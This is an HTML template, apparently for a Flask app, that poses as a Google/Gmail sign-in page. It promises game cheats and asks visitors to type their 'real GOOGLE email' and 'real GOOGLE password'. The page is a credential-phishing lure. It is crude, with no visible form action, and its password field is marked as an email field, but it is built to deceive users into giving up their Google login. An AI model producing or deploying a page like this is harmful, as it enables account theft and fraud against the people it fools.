<html>
<title>Selamat datang di Jimeil!</title>
<head>
    <link rel="stylesheet" href="{{url_for('static',filename='css/style.css')}}" />
    </head>
    <body>
    <center>
    <div class="base">
    <div id="logo">
    <img src="{{url_for('static',filename='images/gulugulu.jpg')}}" width="80" height="80" />
    </div>
    <div id="info1">One account. All of Goooogle.</div>
    <div id="info2">Sign in to continue to Gmail before downloading your cheats on your Favourite Game!</div>
    <div id="form1">
    <div id="form-img">
    <img src="{{url_for('static',filename='images/googleavatar.png')}}" width="99" height="99" />
    </div>
    <div id="mailbox">
    <input placeholder="Enter your real GOOGLE email" type="mail" name="name" 
    style="width:270px; height:42px; border: solid 1px #c2c4c6; 
    font-size:16px; padding-left:8px;" />
    </div>
    <div id="mailbox">
    <input placeholder="Enter your real GOOGLE password" type="mail" name="name" 
    style="width:270px; height:42px; border: solid 1px #c2c4c6; 
    font-size:16px; padding-left:8px;" />
    </div>
    <div><input type="submit" id="button2" value="Submit" /></div>
    <br>
        
    </div>
    </center>
    </body>
    
</html>